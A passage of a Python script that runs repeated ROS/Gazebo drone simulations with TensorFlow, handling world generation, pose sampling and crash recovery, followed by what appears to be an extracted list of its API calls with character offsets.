prev_stat_nn_ready=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
while prev_stat_nn_ready == subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready')):
if time.time()-start_time > wait_time*60:
myprint("{0}: Waited for {3}minutes on nn_ready in {2} to start, seems like tensorflow has crashed on {1} so exit with error code 2.".format(time.strftime("%Y-%m-%d_%I:%M"), FLAGS.condor_host, FLAGS.log_folder, wait_time))
kill_combo()
sys.exit(2)
time.sleep(1)
else:
while(not os.path.isfile(FLAGS.log_folder+'/nn_ready')):
time.sleep(1)
if time.time()-start_time > wait_time*60:
myprint("{0}: Waited for {3}minutes on nn_ready in {2} to start, seems like tensorflow has crashed on {1} so exit with error code 2.".format(time.strftime("%Y-%m-%d_%I:%M"), FLAGS.condor_host, FLAGS.log_folder, wait_time))
kill_combo()
sys.exit(2)
start_python()
myprint("[runscript] set recovery to {0}".format(rospy.get_param('recovery')))
##########################################################################################################################
# STEP 4 Start gazebo environment
def create_environment(run_number, world_name):
"""Call correct python script for generating potentially new environment.
Returns a string with arguments for the launch file to be concatenated to the launch command.
"""
# generate world if it is possible and allowed, this also changes the loaded world file location from the default simsup_demo/worlds to log_folder
world_file=''
world_config=''
background=''
# don't create a new world if one_world is on
if FLAGS.one_world and run_number > 0: return ''
if world_name in ['canyon', 'forest', 'sandbox'] and not FLAGS.reuse_default_world:
generator_file="{0}/python/generators/{1}_generator.py".format(subprocess.check_output(shlex.split("rospack find simulation_supervised_tools"))[:-1],world_name)
subprocess.Popen(shlex.split("python "+generator_file+" "+FLAGS.log_folder)).wait()
background=FLAGS.log_folder+'/'+world_name+'.png'
world_file=FLAGS.log_folder+'/'+world_name+'.world'
elif world_name in ['canyon', 'corridor', 'different_corridor'] and FLAGS.reuse_default_world:
# reuse default 10 evaluation canyons or corridors
world_file='{0}/../simulation_supervised_demo/worlds/{2}_evaluation/{1:05d}_{2}.world'.format(simulation_supervised_dir,run_number%10, world_name)
background='{0}/../simulation_supervised_demo/worlds/{2}_evaluation/{1:05d}_{2}.png'.format(simulation_supervised_dir,run_number%10, world_name)
if 'corridor' in world_name:
command="{0} world_config:={1}/config/environment/{2:05d}_{3}.yaml".format(command, simulation_supervised_dir,run_number%10, world_name)
elif world_name in ['corridor'] and not FLAGS.reuse_default_world:
generator_file="{0}/python/generators/world_generator.py".format(subprocess.check_output(shlex.split("rospack find simulation_supervised_tools"))[:-1])
generator_command="python "+generator_file+" --output_dir "+FLAGS.log_folder+" --output_file "+world_name+"_"+str(run_number)
for p in others: generator_command="{0} {1}".format(generator_command, p)
print("[runscript] Generate command: {0}".format(generator_command))
return_val=subprocess.call(shlex.split(generator_command))
if return_val != 0:
kill_combo()
myprint("Failed to create env {0}, return value: {1}".format(world_name, return_val))
sys.exit(2)
world_file=FLAGS.log_folder+'/'+world_name+"_"+str(run_number)+'.world'
world_config=FLAGS.log_folder+'/'+world_name+"_"+str(run_number)+'.yaml'
arguments='world_name:='+world_name
for arg in ["world_file", "world_config", "background"]:
if len(eval(arg)) != 0: arguments=arguments+" "+arg+":="+eval(arg)
return arguments
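# Illustrative (assumed) return value of create_environment for a generated canyon world:
#   'world_name:=canyon world_file:=<log_folder>/canyon.world background:=<log_folder>/canyon.png'
# This string is appended to the roslaunch command built further below.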
def sample_new_position(starting_positions=[]):
""" Parse a new x,y,z,yaw(quaternion) pose for the robot given the world name and current robot
returns positions: x, y, z and orientation yaw in quaternion (1 ~ +90)
"""
# default with arguments
x, y, z, yaw = 0,0,0,0
if len(starting_positions) != 0:
pos = starting_positions[np.random.choice(range(len(starting_positions)))]
if len(pos) == 2:
x, y = pos
elif len(pos) == 3:
x, y, yaw = pos
elif len(pos) == 4:
x, y, z, yaw = pos
else:
myprint("[run_script] failed to parse starting_position {0}".format(pos))
# overwrite sampled starting positions if they were manually set
if FLAGS.x_pos != 999: x=FLAGS.x_pos
if FLAGS.y_pos != 999: y=FLAGS.y_pos
if FLAGS.z_pos != 999: z=FLAGS.z_pos
if FLAGS.yaw_or != 999: yaw=FLAGS.yaw_or
# add some variation
x += np.random.uniform(-FLAGS.x_var,FLAGS.x_var)
y += np.random.uniform(-FLAGS.y_var,FLAGS.y_var)
z += np.random.uniform(-FLAGS.z_var,FLAGS.z_var)
yaw += np.random.uniform(-FLAGS.yaw_var,FLAGS.yaw_var)
return x, y, z, yaw
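# Illustrative (assumed) usage: sample_new_position([[1.0, 2.0], [3.0, 4.0, 1.57]])
# picks one entry at random, leaves unspecified z/yaw components at 0, applies the
# FLAGS overrides and adds the configured *_var noise before returning (x, y, z, yaw).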
# ensure location for logging the xterm outputs exists.
gazebo_xterm_log_dir="{0}{1}/xterm_gazebo".format(FLAGS.summary_dir,FLAGS.log_tag)
if not os.path.isdir(gazebo_xterm_log_dir): os.makedirs(gazebo_xterm_log_dir)
# Some local variables for running different simulations
prev_environment_arguments=''
reset_gazebo_service=rospy.ServiceProxy('/gazebo/reset_simulation',Emptyservice)
model_state_gazebo_service=rospy.ServiceProxy('/gazebo/set_model_state',SetModelState)
unpause_physics_client=rospy.ServiceProxy('/gazebo/unpause_physics',Emptyservice)
gazebo_popen=None
prev_stat_nn_log=''
prev_stat_fsm_log=''
fsm_file = FLAGS.log_folder+'/fsm_log'
if not os.path.isfile(fsm_file):
with open(fsm_file,'a') as f:
f.write('{0}: {1}\n'.format(time.strftime("%Y-%m-%d_%I-%M-%S"), FLAGS.log_folder))
crashed=False
while (run_number < FLAGS.number_of_runs) or FLAGS.number_of_runs==-1:
######################################
# 4.1 Prepare Run
world_name = FLAGS.worlds[run_number%len(FLAGS.worlds)]
# save current status of NN nn_ready to compare afterwards
if os.path.isfile(FLAGS.log_folder+'/nn_ready'):
prev_stat_nn_log=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
  else: # we have lost communication with our log folder so exit with code 3
myprint("{2}: lost communication with our log folder {0} on host {1} so exit with code 3.".format(FLAGS.log_folder, FLAGS.condor_host, time.strftime("%Y-%m-%d_%I:%M:%S")))
kill_combo()
sys.exit(3)
# clean up gazebo ros folder every now and then
if run_number%50 == 0 : shutil.rmtree("{0}/.gazebo/log".format(os.environ['HOME']),ignore_errors=True)
evaluate=((run_number%FLAGS.evaluate_every) == 0 and run_number != 0 and FLAGS.evaluate_every != -1) or FLAGS.evaluation
# if evaluate:
# rospy.set_param('max_duration', 120)
# else:
# rospy.set_param('max_duration', 5)
new_environment_arguments=create_environment(run_number, world_name)
######################################
# 4.2 Create environment and perform next run
if rospy.has_param('/starting_positions'):
starting_positions = rospy.get_param('starting_positions')
if isinstance(starting_positions,str):
starting_positions=ast.literal_eval(starting_positions)
else:
starting_positions = []
if (new_environment_arguments == prev_environment_arguments or len(new_environment_arguments) == 0) and not crashed and gazebo_popen != None:
# 4.2.1 Reset environment for next run if possible
# 4.2.1a Ensure correct settings
rospy.set_param('/evaluate',evaluate)
# 4.2.1b Reset environment ==> causes gt_node to freeze for more than a minute...
# reset_gazebo_service(EmptyRequest())
# 4.2.1c Change position of drone according to new selected starting position
pose=Pose()
pose.position.x, pose.position.y, starting_height, yaw = sample_new_position(starting_positions)
# pose.position.x, pose.position.y, starting_height, yaw=0,0,1,0
myprint("[run_script]: x: {0}, y: {1}, z: {2}, yaw:{3}".format(pose.position.x, pose.position.y, starting_height, yaw))
      # convert the sampled yaw into quaternion z and w components:
pose.orientation.z=np.sin(yaw)
pose.orientation.w=np.cos(yaw)
pose.position.z = 0.1
model_state = ModelState()
model_state.model_name = 'quadrotor' if FLAGS.robot.startswith('drone') else 'turtlebot3_burger'
model_state.pose=pose
state_request = SetModelStateRequest()
state_request.model_state = model_state
retvals = model_state_gazebo_service(state_request)
rospy.set_param('starting_height', starting_height)
myprint("Changed pose with return values: {0}".format(retvals))
time.sleep(5) # HAS to be 5 otherwise '/overtake' and '/ready' overlap resulting in empty images in gt_listener
unpause_physics_client(EmptyRequest())
else:
# 4.2.2 Launch Gazebo again
# 4.2.2a Ensure previous Gazebo is not running anymore
if gazebo_popen!=None:
kill_popen('gazebo', gazebo_popen)
wait_for_gazebo()
prev_environment_arguments = new_environment_arguments
# 4.2.2b Build command with correct settings
# remove if saving location already exists (probably due to crash previously)
if FLAGS.create_dataset:
data_location="{0}/{1:05d}_{2}".format(FLAGS.data_location,run_number,world_name)
if os.path.isdir(data_location): shutil.rmtree(data_location)
os.makedirs(data_location)
new_environment_arguments+=" save_images:=true"
new_environment_arguments+=" data_location:={0}".format(data_location)
if 'world_file' in new_environment_arguments:
world_file=[a for a in new_environment_arguments.split(' ') if 'world_file' in a][0].split(':=')[1]
myprint("[runscript] world_file {0}".format(world_file))
shutil.copyfile(world_file, data_location+'/'+os.path.basename(world_file))
x,y,z,yaw=sample_new_position(starting_positions)
# x,y,z,yaw=-54, -4, 1, -3.14
command="roslaunch simulation_supervised_demo {0}.launch fsm_config:={1} log_folder:={2} evaluate:={3} {4} graphics:={5} x:={6} y:={7} Yspawned:={9} starting_height:={8} {10}".format(FLAGS.robot,
FLAGS.fsm,
FLAGS.log_folder,
'true' if evaluate else 'false',
new_environment_arguments,
'true' if FLAGS.graphics else 'false',
x,y,z,yaw,
'random_seed:='+str(FLAGS.random_seed) if FLAGS.random_seed else '')
# 4.2.2c Launch command
# Execute command
myprint( "gazebo_command: {0}".format(command))
xterm_log_file='{0}/xterm_gazebo_{1}.txt'.format(gazebo_xterm_log_dir,time.strftime("%Y-%m-%d_%I-%M-%S"))
args = shlex.split("xterm -iconic -l -lf {0} -hold -e {1}".format(xterm_log_file,command))
gazebo_popen = subprocess.Popen(args)
pid_gazebo = gazebo_popen.pid
######################################
# 4.3 Wait for run to finish
  # at this moment the run has not crashed (yet).
crashed=False
crash_checked=False
#print starting positions for visualizing later.
with open(FLAGS.log_folder+'/starting_positions.txt','a') as f:
f.write('{0}, {1}, {2}\n'.format(x,y,yaw))
prev_stat_fsm_log=subprocess.check_output(shlex.split("stat -c %Y "+fsm_file))
time.sleep(0.1)
myprint("\n{0}: started run {1} of the {2} in {4} {3} {5}".format(time.strftime("%Y-%m-%d_%I:%M:%S"),
run_number+1,
FLAGS.number_of_runs,
world_name,
bcolors.OKBLUE,
bcolors.ENDC))
start_time=time.time()
time_spend=0
# while fsm_file has not been updated, wait...
while prev_stat_fsm_log == subprocess.check_output(shlex.split("stat -c %Y "+fsm_file)):
# Check on job suspension:
# if between last update and now has been more than 30 seconds (should be less than 0.1s)
if time.time() - start_time - time_spend > 30:
myprint("{0}: Job got suspended.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
time.sleep(30) #wait for big tick to update
start_time=time.time()
else:
time_spend=time.time() - start_time
# automatically start with /go after 10s
if FLAGS.auto_go:
if 10.05 <= time_spend<10.15:
go_popen=subprocess.Popen(shlex.split("rostopic pub /go std_msgs/Empty"))
elif 11.15 <= time_spend < 11.25 and go_popen.poll()==None:
kill_popen('go', go_popen)
# if False:
# if time_spend > 60*10 and FLAGS.number_of_runs != 1: #don't interupt if this is a single run
if time_spend > 5 and not crash_checked:
crash_checked = True
# check for crash
with open(xterm_log_file, 'r') as f:
for l in f.readlines():
if 'process has died' in l:
myprint("[run_script] {0}: found gz crash in {1}: {2}.".format(time.strftime("%Y-%m-%d_%I:%M:%S"), os.path.basename(xterm_log_file),l[:50]))
crashed=True
crash_number+=1
if crashed:
      if crash_number < 10: # after 10 crashes it is time to restart everything
kill_popen('gazebo', gazebo_popen)
else:
myprint("{0}: crashed for 10the time so restart everything.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
kill_combo()
start_ros()
start_python()
crash_number = 0
break # get out of this loop
time.sleep(0.1)
######################################
# 4.4 Clean up run
# 4.4.1 Wait for NN framework if it is running
if not crashed and 'nn' in FLAGS.fsm:
# wait for nn_ready and stop in case of no tensorflow communication
if os.path.isfile(FLAGS.log_folder+'/nn_ready'):
current_stat=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
start_time=time.time()
myprint("{0}: waiting for nn_ready.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
while current_stat == prev_stat_nn_log:
current_stat=subprocess.check_output(shlex.split("stat -c %Y "+FLAGS.log_folder+'/nn_ready'))
time.sleep(1)
if time.time()-start_time > 8*60:
myprint("{0}: waited for 8minutes on nn_ready to finish training so something went wrong on {1} exit with code 2.".format(time.strftime("%Y-%m-%d_%I:%M:%S"), FLAGS.condor_host))
kill_combo()
sys.exit(2)
else:
myprint("{2}: we have lost communication with our log folder {0} on host {1} so exit with code 3.".format(FLAGS.log_folder, FLAGS.condor_host, time.strftime("%Y-%m-%d_%I:%M:%S")))
kill_combo()
sys.exit(3)
if not crashed:
message = open(fsm_file,'r').readlines()[-1].strip()
myprint("{0}: ended run {1} with {3}{2}{4}".format(time.strftime("%Y-%m-%d_%I:%M:%S"), run_number+1, message, bcolors.OKGREEN if 'success' in message else bcolors.FAIL, bcolors.ENDC))
# increment also in case of crash as drone has zero turning speed:
run_number+=1
if message == 'FINISHED': # make this the final run for evaluation
FLAGS.number_of_runs=run_number+FLAGS.final_evaluation_runs
FLAGS.evaluation=True
# run_number = FLAGS.number_of_runs-1
time.sleep(3)
# extra second needed to save image in gt_listener
# after all required runs are finished
kill_combo()
myprint("\n{0}: done.".format(time.strftime("%Y-%m-%d_%I:%M:%S")))
|
[
"shlex.split",
"yaml.load",
"time.sleep",
"sys.exit",
"numpy.sin",
"geometry_msgs.msg.Pose",
"os.remove",
"os.listdir",
"argparse.ArgumentParser",
"subprocess.Popen",
"rospy.ServiceProxy",
"os.path.isdir",
"subprocess.call",
"numpy.random.seed",
"gazebo_msgs.srv.SetModelStateRequest",
"rospy.get_param",
"rospy.has_param",
"rospy.set_param",
"os.path.isfile",
"gazebo_msgs.msg.ModelState",
"ast.literal_eval",
"numpy.random.uniform",
"numpy.cos",
"time.time",
"std_srvs.srv.EmptyRequest",
"os.makedirs",
"time.strftime",
"os.path.basename",
"shutil.rmtree"
] |
[((5271, 5653), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run_simulation_scripts governs the running of long gazebo_ros_tensorflow simulations.\n The core functionality lies in:\n 1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)\n 2. different crash handling when for instance starting gazebo / tensorflow fails"""'}), '(description=\n """Run_simulation_scripts governs the running of long gazebo_ros_tensorflow simulations.\n The core functionality lies in:\n 1. parsing the correct arguments at different levels (tensorflow dnn, gazebo environment, ros supervision)\n 2. different crash handling when for instance starting gazebo / tensorflow fails"""\n )\n', (5294, 5653), False, 'import argparse\n'), ((24021, 24081), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['"""/gazebo/reset_simulation"""', 'Emptyservice'], {}), "('/gazebo/reset_simulation', Emptyservice)\n", (24039, 24081), False, 'import rospy\n'), ((24108, 24168), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['"""/gazebo/set_model_state"""', 'SetModelState'], {}), "('/gazebo/set_model_state', SetModelState)\n", (24126, 24168), False, 'import rospy\n'), ((24191, 24250), 'rospy.ServiceProxy', 'rospy.ServiceProxy', (['"""/gazebo/unpause_physics"""', 'Emptyservice'], {}), "('/gazebo/unpause_physics', Emptyservice)\n", (24209, 24250), False, 'import rospy\n'), ((2953, 3008), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (2969, 3008), False, 'import subprocess, shlex\n'), ((3020, 3095), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'gz']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'gz'], stdin=p_ps.stdout, stdout=subprocess.PIPE)\n", (3036, 3095), False, 'import subprocess, shlex\n'), ((3440, 3453), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3450, 3453), False, 'import time\n'), ((3574, 3629), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (3590, 3629), False, 'import subprocess, shlex\n'), ((3641, 3733), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'create_dataset']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'create_dataset'], stdin=p_ps.stdout, stdout=\n subprocess.PIPE)\n", (3657, 3733), False, 'import subprocess, shlex\n'), ((4224, 4237), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4234, 4237), False, 'import time\n'), ((4247, 4308), 'subprocess.call', 'subprocess.call', (["['rosparam', 'list']"], {'stdout': 'subprocess.PIPE'}), "(['rosparam', 'list'], stdout=subprocess.PIPE)\n", (4262, 4308), False, 'import subprocess, shlex\n'), ((5095, 5108), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (5105, 5108), False, 'import time\n'), ((11536, 11584), 'os.path.isdir', 'os.path.isdir', (['(FLAGS.summary_dir + FLAGS.log_tag)'], {}), '(FLAGS.summary_dir + FLAGS.log_tag)\n', (11549, 11584), False, 'import sys, os, os.path\n'), ((11640, 11686), 'os.path.isdir', 'os.path.isdir', (['(FLAGS.data_root + FLAGS.log_tag)'], {}), '(FLAGS.data_root + FLAGS.log_tag)\n', (11653, 11686), False, 'import sys, os, os.path\n'), ((12099, 12132), 'numpy.random.seed', 'np.random.seed', (['FLAGS.random_seed'], {}), '(FLAGS.random_seed)\n', (12113, 12132), True, 'import numpy as np\n'), ((12252, 12340), 'os.path.isfile', 'os.path.isfile', (["(simulation_supervised_dir + '/config/robot/' + FLAGS.robot + 
'.yaml')"], {}), "(simulation_supervised_dir + '/config/robot/' + FLAGS.robot +\n '.yaml')\n", (12266, 12340), False, 'import sys, os, os.path\n'), ((12402, 12413), 'sys.exit', 'sys.exit', (['(4)'], {}), '(4)\n', (12410, 12413), False, 'import sys, os, os.path\n'), ((15421, 15453), 'os.path.isdir', 'os.path.isdir', (['ros_xterm_log_dir'], {}), '(ros_xterm_log_dir)\n', (15434, 15453), False, 'import sys, os, os.path\n'), ((15455, 15485), 'os.makedirs', 'os.makedirs', (['ros_xterm_log_dir'], {}), '(ros_xterm_log_dir)\n', (15466, 15485), False, 'import sys, os, os.path\n'), ((15759, 15852), 'os.path.isfile', 'os.path.isfile', (["(simulation_supervised_dir + '/config/environment/' + worlds[0] + '.yaml')"], {}), "(simulation_supervised_dir + '/config/environment/' + worlds[\n 0] + '.yaml')\n", (15773, 15852), False, 'import sys, os, os.path\n'), ((16066, 16096), 'os.path.isfile', 'os.path.isfile', (['xterm_log_file'], {}), '(xterm_log_file)\n', (16080, 16096), False, 'import sys, os, os.path\n'), ((16231, 16253), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args)\n', (16247, 16253), False, 'import subprocess, shlex\n'), ((16397, 16488), 'rospy.set_param', 'rospy.set_param', (['"""evaluate_every"""', '(FLAGS.evaluate_every if not FLAGS.evaluation else 1)'], {}), "('evaluate_every', FLAGS.evaluate_every if not FLAGS.\n evaluation else 1)\n", (16412, 16488), False, 'import rospy\n'), ((16487, 16530), 'rospy.set_param', 'rospy.set_param', (['"""recovery"""', 'FLAGS.recovery'], {}), "('recovery', FLAGS.recovery)\n", (16502, 16530), False, 'import rospy\n'), ((16785, 16820), 'os.path.isdir', 'os.path.isdir', (['python_xterm_log_dir'], {}), '(python_xterm_log_dir)\n', (16798, 16820), False, 'import sys, os, os.path\n'), ((16822, 16855), 'os.makedirs', 'os.makedirs', (['python_xterm_log_dir'], {}), '(python_xterm_log_dir)\n', (16833, 16855), False, 'import sys, os, os.path\n'), ((18186, 18216), 'os.path.isfile', 'os.path.isfile', (['xterm_log_file'], {}), '(xterm_log_file)\n', (18200, 18216), False, 'import sys, os, os.path\n'), ((18367, 18389), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args)\n', (18383, 18389), False, 'import subprocess, shlex\n'), ((18615, 18626), 'time.time', 'time.time', ([], {}), '()\n', (18624, 18626), False, 'import time\n'), ((18648, 18694), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (18662, 18694), False, 'import sys, os, os.path\n'), ((23467, 23511), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.x_var)', 'FLAGS.x_var'], {}), '(-FLAGS.x_var, FLAGS.x_var)\n', (23484, 23511), True, 'import numpy as np\n'), ((23518, 23562), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.y_var)', 'FLAGS.y_var'], {}), '(-FLAGS.y_var, FLAGS.y_var)\n', (23535, 23562), True, 'import numpy as np\n'), ((23569, 23613), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.z_var)', 'FLAGS.z_var'], {}), '(-FLAGS.z_var, FLAGS.z_var)\n', (23586, 23613), True, 'import numpy as np\n'), ((23622, 23670), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.yaw_var)', 'FLAGS.yaw_var'], {}), '(-FLAGS.yaw_var, FLAGS.yaw_var)\n', (23639, 23670), True, 'import numpy as np\n'), ((23841, 23876), 'os.path.isdir', 'os.path.isdir', (['gazebo_xterm_log_dir'], {}), '(gazebo_xterm_log_dir)\n', (23854, 23876), False, 'import sys, os, os.path\n'), ((23878, 23911), 'os.makedirs', 'os.makedirs', (['gazebo_xterm_log_dir'], {}), '(gazebo_xterm_log_dir)\n', (23889, 23911), False, 'import sys, os, 
os.path\n'), ((24356, 24380), 'os.path.isfile', 'os.path.isfile', (['fsm_file'], {}), '(fsm_file)\n', (24370, 24380), False, 'import sys, os, os.path\n'), ((24779, 24825), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (24793, 24825), False, 'import sys, os, os.path\n'), ((25779, 25817), 'rospy.has_param', 'rospy.has_param', (['"""/starting_positions"""'], {}), "('/starting_positions')\n", (25794, 25817), False, 'import rospy\n'), ((29998, 30013), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (30008, 30013), False, 'import time\n'), ((30502, 30513), 'time.time', 'time.time', ([], {}), '()\n', (30511, 30513), False, 'import time\n'), ((34050, 34063), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (34060, 34063), False, 'import time\n'), ((3241, 3296), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (3257, 3296), False, 'import subprocess, shlex\n'), ((3310, 3385), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'gz']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'gz'], stdin=p_ps.stdout, stdout=subprocess.PIPE)\n", (3326, 3385), False, 'import subprocess, shlex\n'), ((3422, 3437), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (3432, 3437), False, 'import time\n'), ((3888, 3943), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (3904, 3943), False, 'import subprocess, shlex\n'), ((3957, 4049), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'create_dataset']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'create_dataset'], stdin=p_ps.stdout, stdout=\n subprocess.PIPE)\n", (3973, 4049), False, 'import subprocess, shlex\n'), ((4081, 4096), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (4091, 4096), False, 'import time\n'), ((4408, 4421), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4418, 4421), False, 'import time\n'), ((4433, 4494), 'subprocess.call', 'subprocess.call', (["['rosparam', 'list']"], {'stdout': 'subprocess.PIPE'}), "(['rosparam', 'list'], stdout=subprocess.PIPE)\n", (4448, 4494), False, 'import subprocess, shlex\n'), ((10640, 10689), 'shlex.split', 'shlex.split', (['"""rospack find simulation_supervised"""'], {}), "('rospack find simulation_supervised')\n", (10651, 10689), False, 'import subprocess, shlex\n'), ((11584, 11632), 'shutil.rmtree', 'shutil.rmtree', (['(FLAGS.summary_dir + FLAGS.log_tag)'], {}), '(FLAGS.summary_dir + FLAGS.log_tag)\n', (11597, 11632), False, 'import shutil\n'), ((11686, 11732), 'shutil.rmtree', 'shutil.rmtree', (['(FLAGS.data_root + FLAGS.log_tag)'], {}), '(FLAGS.data_root + FLAGS.log_tag)\n', (11699, 11732), False, 'import shutil\n'), ((12493, 12620), 'shlex.split', 'shlex.split', (['"""cat $_CONDOR_JOB_AD | grep RemoteHost | head -1 | cut -d \'=\' -f 2 | cut -d \'@\' -f 2 | cut -d \'.\' -f 1)"""'], {}), '(\n "cat $_CONDOR_JOB_AD | grep RemoteHost | head -1 | cut -d \'=\' -f 2 | cut -d \'@\' -f 2 | cut -d \'.\' -f 1)"\n )\n', (12504, 12620), False, 'import subprocess, shlex\n'), ((14019, 14053), 'os.path.isdir', 'os.path.isdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14032, 14053), False, 'import sys, os, os.path\n'), ((14104, 14138), 'shutil.rmtree', 'shutil.rmtree', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14117, 14138), False, 'import shutil\n'), ((14148, 14182), 
'os.path.isdir', 'os.path.isdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14161, 14182), False, 'import sys, os, os.path\n'), ((14188, 14220), 'os.makedirs', 'os.makedirs', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14199, 14220), False, 'import sys, os, os.path\n'), ((16029, 16059), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I%M"""'], {}), "('%Y-%m-%d_%I%M')\n", (16042, 16059), False, 'import time\n'), ((16098, 16123), 'os.remove', 'os.remove', (['xterm_log_file'], {}), '(xterm_log_file)\n', (16107, 16123), False, 'import sys, os, os.path\n'), ((18149, 18179), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I%M"""'], {}), "('%Y-%m-%d_%I%M')\n", (18162, 18179), False, 'import time\n'), ((18218, 18243), 'os.remove', 'os.remove', (['xterm_log_file'], {}), '(xterm_log_file)\n', (18227, 18243), False, 'import sys, os, os.path\n'), ((19727, 19754), 'rospy.get_param', 'rospy.get_param', (['"""recovery"""'], {}), "('recovery')\n", (19742, 19754), False, 'import rospy\n'), ((25201, 25212), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (25209, 25212), False, 'import sys, os, os.path\n'), ((25844, 25881), 'rospy.get_param', 'rospy.get_param', (['"""starting_positions"""'], {}), "('starting_positions')\n", (25859, 25881), False, 'import rospy\n'), ((26264, 26302), 'rospy.set_param', 'rospy.set_param', (['"""/evaluate"""', 'evaluate'], {}), "('/evaluate', evaluate)\n", (26279, 26302), False, 'import rospy\n'), ((26532, 26538), 'geometry_msgs.msg.Pose', 'Pose', ([], {}), '()\n', (26536, 26538), False, 'from geometry_msgs.msg import Pose\n'), ((26911, 26922), 'numpy.sin', 'np.sin', (['yaw'], {}), '(yaw)\n', (26917, 26922), True, 'import numpy as np\n'), ((26946, 26957), 'numpy.cos', 'np.cos', (['yaw'], {}), '(yaw)\n', (26952, 26957), True, 'import numpy as np\n'), ((27002, 27014), 'gazebo_msgs.msg.ModelState', 'ModelState', ([], {}), '()\n', (27012, 27014), False, 'from gazebo_msgs.msg import ModelState\n'), ((27162, 27184), 'gazebo_msgs.srv.SetModelStateRequest', 'SetModelStateRequest', ([], {}), '()\n', (27182, 27184), False, 'from gazebo_msgs.srv import SetModelStateRequest\n'), ((27289, 27340), 'rospy.set_param', 'rospy.set_param', (['"""starting_height"""', 'starting_height'], {}), "('starting_height', starting_height)\n", (27304, 27340), False, 'import rospy\n'), ((27418, 27431), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (27428, 27431), False, 'import time\n'), ((29528, 29550), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args)\n', (29544, 29550), False, 'import subprocess, shlex\n'), ((29959, 29996), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + fsm_file)"], {}), "('stat -c %Y ' + fsm_file)\n", (29970, 29996), False, 'import subprocess, shlex\n'), ((32299, 32314), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (32309, 32314), False, 'import time\n'), ((32546, 32592), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (32560, 32592), False, 'import sys, os, os.path\n'), ((34201, 34235), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (34214, 34235), False, 'import time\n'), ((2547, 2564), 'yaml.load', 'yaml.load', (['stream'], {}), '(stream)\n', (2556, 2564), False, 'import yaml\n'), ((3134, 3168), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (3147, 3168), False, 'import time\n'), ((3775, 3809), 'time.strftime', 'time.strftime', 
